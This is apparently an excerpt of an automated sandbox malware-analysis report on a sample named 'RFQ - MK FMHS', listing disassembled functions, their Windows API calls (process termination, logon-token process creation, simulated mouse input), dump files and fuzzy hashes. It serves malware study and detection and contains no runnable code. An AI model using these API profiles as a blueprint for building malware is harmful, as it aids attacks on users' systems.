                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E7182C
                    • EndPaint.USER32(?,?), ref: 00E71876
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: 496f0c11e52a9540a25755da18eef72396a1a20f08cbf405223c37010b9b64aa
                    • Instruction ID: e219a1c4d3cc6517893a18f6a35312483c57050f27538babfaa9cc6ef14b64c5
                    • Opcode Fuzzy Hash: 496f0c11e52a9540a25755da18eef72396a1a20f08cbf405223c37010b9b64aa
                    • Instruction Fuzzy Hash: 0B419471104304AFD710DF29CC84FBA7BE9EF4A724F148669F598EB2A2C7319845DB62
                    Function 00EFB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(00F367B0,00000000,014B7648,?,?,00F367B0,?,00EFB862,?,?), ref: 00EFB9CC
                    • EnableWindow.USER32(00000000,00000000), ref: 00EFB9F0
                    • ShowWindow.USER32(00F367B0,00000000,014B7648,?,?,00F367B0,?,00EFB862,?,?), ref: 00EFBA50
                    • ShowWindow.USER32(00000000,00000004,?,00EFB862,?,?), ref: 00EFBA62
                    • EnableWindow.USER32(00000000,00000001), ref: 00EFBA86
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00EFBAA9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: 491f0a6df60e67e8c509c70c6e458439e7694d506eb25cbaf6f9a06911fa503f
                    • Instruction ID: e06649308c71dc6c34ed21c276bedc4ce7c71a789ddd4a2e3ac34e3ca9e906c6
                    • Opcode Fuzzy Hash: 491f0a6df60e67e8c509c70c6e458439e7694d506eb25cbaf6f9a06911fa503f
                    • Instruction Fuzzy Hash: D9417130600649AFDB21CF15C889BB57BE0FF45318F1852B9EB58AF6A2C771E845CB50
                    Function 00EE73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00EE5134,?,?,00000000,00000001), ref: 00EE73BF
                      • Part of subcall function 00EE3C94: GetWindowRect.USER32(?,?), ref: 00EE3CA7
                    • GetDesktopWindow.USER32 ref: 00EE73E9
                    • GetWindowRect.USER32(00000000), ref: 00EE73F0
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EE7422
                      • Part of subcall function 00ED54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED555E
                    • GetCursorPos.USER32(?), ref: 00EE744E
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EE74AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: f818e34be2b49585d72db383fdaa6e7433eacfd9aada9c95f6b9c525050a1b43
                    • Instruction ID: 554b9e48d0e987f218eccc6954d24dc3868d54db6c6b0be4ee9942befefffb94
                    • Opcode Fuzzy Hash: f818e34be2b49585d72db383fdaa6e7433eacfd9aada9c95f6b9c525050a1b43
                    • Instruction Fuzzy Hash: 1931E672508349AFD720DF15D849F9BBBE9FF88314F00191AF599A7191DB30E909CB92
                    Function 00EC8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EC85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC8608
                      • Part of subcall function 00EC85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC8612
                      • Part of subcall function 00EC85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC8621
                      • Part of subcall function 00EC85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC8628
                      • Part of subcall function 00EC85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC863E
                    • GetLengthSid.ADVAPI32(?,00000000,00EC8977), ref: 00EC8DAC
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EC8DB8
                    • HeapAlloc.KERNEL32(00000000), ref: 00EC8DBF
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00EC8DD8
                    • GetProcessHeap.KERNEL32(00000000,00000000,00EC8977), ref: 00EC8DEC
                    • HeapFree.KERNEL32(00000000), ref: 00EC8DF3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 3008561057-0
                    • Opcode ID: 913fffaad12f01926d640f3ae05091933d94ecd09b189b94e927bdff5b8c58ae
                    • Instruction ID: 4b7e8857ce6132637f22573cf370121f4aca548a2f40784677d22116e2256641
                    • Opcode Fuzzy Hash: 913fffaad12f01926d640f3ae05091933d94ecd09b189b94e927bdff5b8c58ae
                    • Instruction Fuzzy Hash: D811CD32901604FFDB108B65CF08FBE7BADEF8031AF10412DE846A3251CB329905CB60
                    Function 00EC8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EC8B2A
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00EC8B31
                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EC8B40
                    • CloseHandle.KERNEL32(00000004), ref: 00EC8B4B
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EC8B7A
                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00EC8B8E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 1413079979-0
                    • Opcode ID: 2d6618a4e566e26f35b2327737c2cba1baa138e3316670956a1436c4a94e2195
                    • Instruction ID: 01550aa2a3868cca9d9e9e275c9c133d23b7df490a5b472cddf11dd1316ed857
                    • Opcode Fuzzy Hash: 2d6618a4e566e26f35b2327737c2cba1baa138e3316670956a1436c4a94e2195
                    • Instruction Fuzzy Hash: F0115CB6501209AFDF018FA5DE49FEA7BA9EF48308F045069FE04B2160C7729D65DB60
                    Function 00EFC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E7134D
                      • Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7135C
                      • Part of subcall function 00E712F3: BeginPath.GDI32(?), ref: 00E71373
                      • Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7139C
                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00EFC1C4
                    • LineTo.GDI32(00000000,00000003,?), ref: 00EFC1D8
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EFC1E6
                    • LineTo.GDI32(00000000,00000000,?), ref: 00EFC1F6
                    • EndPath.GDI32(00000000), ref: 00EFC206
                    • StrokePath.GDI32(00000000), ref: 00EFC216
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: 86ec6051efcd3ab564fd734f462a8fa8ba460e73fe1d60b0d4fa54656fcf6f26
                    • Instruction ID: 44b688d13b20a6b446358b9b66ac988828615a5e341820b719ad4a70e12fef54
                    • Opcode Fuzzy Hash: 86ec6051efcd3ab564fd734f462a8fa8ba460e73fe1d60b0d4fa54656fcf6f26
                    • Instruction Fuzzy Hash: 9B111E7640014CBFEF119F95DC88EAA7FADEF08354F148021FA1896171C7719D59DBA0
                    Function 00E903A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E903D3
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E903DB
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E903E6
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E903F1
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E903F9
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E90401
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: d7faefcf82d3c4e8fac2094a321488d2cedb56e81882856c536745781cdedf33
                    • Instruction ID: 4c69ff03713e93cd0a3626b6e629d664384f0ef561bd4e1738ead46a11ce0ad0
                    • Opcode Fuzzy Hash: d7faefcf82d3c4e8fac2094a321488d2cedb56e81882856c536745781cdedf33
                    • Instruction Fuzzy Hash: CF016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BE15C87941C7F5A868CBE5
                    Function 00ED568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                    Download Yara Rule
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00ED569B
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00ED56B1
                    • GetWindowThreadProcessId.USER32(?,?), ref: 00ED56C0
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED56CF
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED56D9
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED56E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: eb4834b874bf09661cd9ccc038021cc0a49dfb130c57c09eb853c431201c7912
                    • Instruction ID: c8a83844d3149217fa10289ecfd537514fcd0f1d4e4590729898e6d8914860ba
                    • Opcode Fuzzy Hash: eb4834b874bf09661cd9ccc038021cc0a49dfb130c57c09eb853c431201c7912
                    • Instruction Fuzzy Hash: 8DF06D32241118BFE3205BA39C0DEFF7A7CEFC6B11F000169FA04E11519AA05A05C6B5
                    Function 00ED74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 00ED74E5
                    • EnterCriticalSection.KERNEL32(?,?,00E81044,?,?), ref: 00ED74F6
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00E81044,?,?), ref: 00ED7503
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E81044,?,?), ref: 00ED7510
                      • Part of subcall function 00ED6ED7: CloseHandle.KERNEL32(00000000,?,00ED751D,?,00E81044,?,?), ref: 00ED6EE1
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ED7523
                    • LeaveCriticalSection.KERNEL32(?,?,00E81044,?,?), ref: 00ED752A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: 587d0d76b686b268b3de61b4b6302b655e69fd65ad9ed051d57a377db5c10c29
                    • Instruction ID: c73b3d7ca5aeeff471cbbb411a727af1e29398c169fcdfd7455e0ca3a0dab404
                    • Opcode Fuzzy Hash: 587d0d76b686b268b3de61b4b6302b655e69fd65ad9ed051d57a377db5c10c29
                    • Instruction Fuzzy Hash: 43F05E3A540612EFEB111B65FC8C9FB7B2AEF85302B401532F602B11B1DB755906CB50
                    Function 00EC8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EC8E7F
                    • UnloadUserProfile.USERENV(?,?), ref: 00EC8E8B
                    • CloseHandle.KERNEL32(?), ref: 00EC8E94
                    • CloseHandle.KERNEL32(?), ref: 00EC8E9C
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC8EA5
                    • HeapFree.KERNEL32(00000000), ref: 00EC8EAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                    • String ID:
                    • API String ID: 146765662-0
                    • Opcode ID: 7f25f09363862a0a528cfbc553dbbd763c7b18fbac58d785313f70516199c14b
                    • Instruction ID: 5f6692e81d5d25afdd62524bd14063b5a6238b9034e4ab285ee684a5dc4a5087
                    • Opcode Fuzzy Hash: 7f25f09363862a0a528cfbc553dbbd763c7b18fbac58d785313f70516199c14b
                    • Instruction Fuzzy Hash: 47E0C237005002FFDA012FE2EC0C92ABF69FFC9322B548231F219A10B1CB329428DB50
                    Function 00EE8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00EE8928
                    • CharUpperBuffW.USER32(?,?), ref: 00EE8A37
                    • VariantClear.OLEAUT32(?), ref: 00EE8BAF
                      • Part of subcall function 00ED7804: VariantInit.OLEAUT32(00000000), ref: 00ED7844
                      • Part of subcall function 00ED7804: VariantCopy.OLEAUT32(00000000,?), ref: 00ED784D
                      • Part of subcall function 00ED7804: VariantClear.OLEAUT32(00000000), ref: 00ED7859
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: c246cf4c3afbedaad57230ade6ae78253b30d3c573a3f767ff7d3d45aa6e7274
                    • Instruction ID: 17894da0a46245f810098a216296188bbe5454fc67b73166b03604901a7ab1be
                    • Opcode Fuzzy Hash: c246cf4c3afbedaad57230ade6ae78253b30d3c573a3f767ff7d3d45aa6e7274
                    • Instruction Fuzzy Hash: 3691BC75A083459FC700DF25C58096ABBE4EFC8314F04996EF89EAB362DB31E905CB52
                    Function 00ED2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9
                    • _memset.LIBCMT ref: 00ED3077
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ED30A6
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ED3159
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00ED3187
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: 019f66c45e003e7371a38cdb4e449e76a7ea6969429edb3d723cfc524329c0b8
                    • Instruction ID: 757aa4cd8e633f7a21de937452b022a4e022a263167b7cbad0e0bcb8ba06badc
                    • Opcode Fuzzy Hash: 019f66c45e003e7371a38cdb4e449e76a7ea6969429edb3d723cfc524329c0b8
                    • Instruction Fuzzy Hash: C151D031609302AED7259F38C845A6BB7E4EF45364F046A2EF895F3291DB70CE468763
                    Function 00ECDA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00ECDAC5
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00ECDAFB
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00ECDB0C
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00ECDB8E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressCreateInstanceProc
                    • String ID: DllGetClassObject
                    • API String ID: 753597075-1075368562
                    • Opcode ID: 89fad5c9bcfe49b3a1fa1c385411d9df5d6a86eab376b4066a1f0dd3eb991d30
                    • Instruction ID: 46af4e634bb86ddc7dfc1ba597ead8d23c08a45799fd219c2c3649885152bddb
                    • Opcode Fuzzy Hash: 89fad5c9bcfe49b3a1fa1c385411d9df5d6a86eab376b4066a1f0dd3eb991d30
                    • Instruction Fuzzy Hash: 86418DB1604208DFDB04CF15CD84F9ABBB9EF44310F1590AEA905AF206D7B2DD45DBA0
                    Function 00ED2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00ED2CAF
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00ED2CCB
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00ED2D11
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F36890,00000000), ref: 00ED2D5A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: 1707bec59df465a4de149f9556020aa4359b569b82759f3658fa96a121555c16
                    • Instruction ID: 3d9588f82736e1337a998ef05e300af70c90738085b798eb39ab5d3536243e63
                    • Opcode Fuzzy Hash: 1707bec59df465a4de149f9556020aa4359b569b82759f3658fa96a121555c16
                    • Instruction Fuzzy Hash: 4D41A0302043019FD724DF24C844B5ABBE9EFD5324F14565EFA65AB391D770E906CB92
                    Function 00EEDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EEDAD9
                      • Part of subcall function 00E779AB: _memmove.LIBCMT ref: 00E779F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
